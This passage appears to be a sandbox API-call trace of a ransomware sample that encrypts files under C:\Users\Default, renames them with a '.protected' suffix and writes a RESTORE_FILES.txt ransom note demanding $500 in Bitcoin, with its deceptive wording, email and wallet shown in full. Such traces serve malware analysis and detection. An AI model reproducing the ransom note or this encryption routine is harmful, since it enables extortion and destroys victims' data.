(lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.protected" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms.protected")) returned 1 [0095.424] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.424] lstrcmpiW (lpString1="ntuser.ini", lpString2="Windows") returned -1 [0095.424] lstrcmpiW (lpString1="ntuser.ini", lpString2="Program Files") returned -1 [0095.424] lstrcmpiW (lpString1="ntuser.ini", lpString2="Program Files (x86)") returned -1 [0095.424] lstrcmpiW (lpString1="ntuser.ini", lpString2="$Recycle.bin") returned 1 [0095.424] lstrcmpiW (lpString1="ntuser.ini", lpString2="System Volume Information") returned -1 [0095.425] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\ntuser.ini") returned 31 [0095.425] StrStrIW (lpFirst="ntuser.ini", lpSrch=".protected") returned 0x0 [0095.425] lstrcmpW (lpString1="ntuser.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.425] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0095.425] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0095.425] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\ntuser.ini" (normalized: "c:\\users\\default\\ntuser.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.425] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\ntuser.ini") returned 31 [0095.425] StrStrW (lpFirst="ntuser.ini", lpSrch=".txt") returned 0x0 [0095.425] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\ntuser.ini") returned 31 [0095.425] StrStrW (lpFirst="ntuser.ini", lpSrch=".rar") returned 0x0 [0095.425] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\ntuser.ini") returned 31 [0095.425] StrStrW (lpFirst="ntuser.ini", lpSrch=".zip") returned 0x0 [0095.425] ReadFile (in: hFile=0xa4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f3e4*=0x14, lpOverlapped=0x0) returned 1 [0095.426] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xffffffec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.426] WriteFile (in: hFile=0xa4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f3e4*=0x14, lpOverlapped=0x0) returned 1 [0095.426] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.426] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0095.427] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0095.427] CloseHandle (hObject=0xa4) returned 1 [0095.427] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\ntuser.ini.protected") returned 41 [0095.427] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\ntuser.ini" (normalized: "c:\\users\\default\\ntuser.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\ntuser.ini.protected" (normalized: "c:\\users\\default\\ntuser.ini.protected")) returned 1 [0095.428] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.428] lstrcmpiW (lpString1="Pictures", lpString2="Windows") returned -1 [0095.428] lstrcmpiW (lpString1="Pictures", lpString2="Program Files") returned -1 [0095.428] lstrcmpiW (lpString1="Pictures", lpString2="Program Files (x86)") returned -1 [0095.428] lstrcmpiW (lpString1="Pictures", lpString2="$Recycle.bin") returned 1 [0095.428] lstrcmpiW (lpString1="Pictures", lpString2="System Volume Information") returned -1 [0095.428] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures") returned 29 [0095.428] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1 [0095.428] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1 [0095.428] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures\\*") returned 31 [0095.428] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.428] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.428] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.428] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.428] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.428] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.428] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures\\.") returned 31 [0095.428] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.428] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.428] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.428] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.428] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.428] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\." (normalized: "c:\\users\\default\\pictures\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.428] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.429] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.429] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.429] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.429] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.429] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.429] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures\\..") returned 32 [0095.429] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.429] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.429] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.429] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.429] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.429] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\.." (normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.429] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.429] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.429] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.429] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.429] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.429] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.429] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini") returned 41 [0095.429] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.429] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.429] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.429] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini" (normalized: "c:\\users\\default\\pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.430] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini") returned 41 [0095.430] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.430] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini") returned 41 [0095.430] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.430] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini") returned 41 [0095.430] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.430] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x1f8, lpOverlapped=0x0) returned 1 [0095.431] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.431] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x1f8, lpOverlapped=0x0) returned 1 [0095.431] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.431] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.431] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.431] CloseHandle (hObject=0xb4) returned 1 [0095.431] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini.protected") returned 51 [0095.431] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini" (normalized: "c:\\users\\default\\pictures\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini.protected" (normalized: "c:\\users\\default\\pictures\\desktop.ini.protected")) returned 1 [0095.432] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.432] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.432] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures\\RESTORE_FILES.txt") returned 47 [0095.432] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\pictures\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.432] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.432] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.433] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0095.433] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.433] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.433] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0095.433] CloseHandle (hObject=0xa4) returned 1 [0095.433] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.433] lstrcmpiW (lpString1="PrintHood", lpString2="Windows") returned -1 [0095.433] lstrcmpiW (lpString1="PrintHood", lpString2="Program Files") returned -1 [0095.433] lstrcmpiW (lpString1="PrintHood", lpString2="Program Files (x86)") returned -1 [0095.433] lstrcmpiW (lpString1="PrintHood", lpString2="$Recycle.bin") returned 1 [0095.433] lstrcmpiW (lpString1="PrintHood", lpString2="System Volume Information") returned -1 [0095.434] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\PrintHood") returned 30 [0095.434] lstrcmpW (lpString1="PrintHood", lpString2=".") returned 1 [0095.434] lstrcmpW (lpString1="PrintHood", lpString2="..") returned 1 [0095.434] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\PrintHood\\*") returned 32 [0095.434] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\PrintHood\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0095.434] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.434] lstrcmpiW (lpString1="Recent", lpString2="Windows") returned -1 [0095.434] lstrcmpiW (lpString1="Recent", lpString2="Program Files") returned 1 [0095.434] lstrcmpiW (lpString1="Recent", lpString2="Program Files (x86)") returned 1 [0095.434] lstrcmpiW (lpString1="Recent", lpString2="$Recycle.bin") returned 1 [0095.434] lstrcmpiW (lpString1="Recent", lpString2="System Volume Information") returned -1 [0095.434] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Recent") returned 27 [0095.434] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0095.434] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0095.434] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Recent\\*") returned 29 [0095.434] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Recent\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0095.434] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.434] lstrcmpiW (lpString1="Saved Games", lpString2="Windows") returned -1 [0095.434] lstrcmpiW (lpString1="Saved Games", lpString2="Program Files") returned 1 [0095.434] lstrcmpiW (lpString1="Saved Games", lpString2="Program Files (x86)") returned 1 [0095.434] lstrcmpiW (lpString1="Saved Games", lpString2="$Recycle.bin") returned 1 [0095.434] lstrcmpiW (lpString1="Saved Games", lpString2="System Volume Information") returned -1 [0095.434] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games") returned 32 [0095.434] lstrcmpW (lpString1="Saved Games", lpString2=".") returned 1 [0095.434] lstrcmpW (lpString1="Saved Games", lpString2="..") returned 1 [0095.434] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games\\*") returned 34 [0095.434] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.435] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.435] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.435] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.435] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.435] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.435] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games\\.") returned 34 [0095.435] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.435] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.435] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.435] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.435] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.435] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\." (normalized: "c:\\users\\default\\saved games\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.435] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.435] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.435] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.435] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.435] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.435] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.435] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games\\..") returned 35 [0095.435] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.435] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.435] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.435] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.435] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.435] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.435] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\.." (normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.435] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.435] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.435] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.435] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.435] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.435] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.435] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini") returned 44 [0095.435] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.435] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.435] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.436] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.436] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini" (normalized: "c:\\users\\default\\saved games\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.436] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini") returned 44 [0095.436] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.436] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini") returned 44 [0095.436] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.436] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini") returned 44 [0095.436] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.436] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x11a, lpOverlapped=0x0) returned 1 [0095.437] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffee6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.437] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x11a, lpOverlapped=0x0) returned 1 [0095.437] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.437] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.437] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.437] CloseHandle (hObject=0xb4) returned 1 [0095.437] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini.protected") returned 54 [0095.437] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini" (normalized: "c:\\users\\default\\saved games\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini.protected" (normalized: "c:\\users\\default\\saved games\\desktop.ini.protected")) returned 1 [0095.438] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.438] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.438] 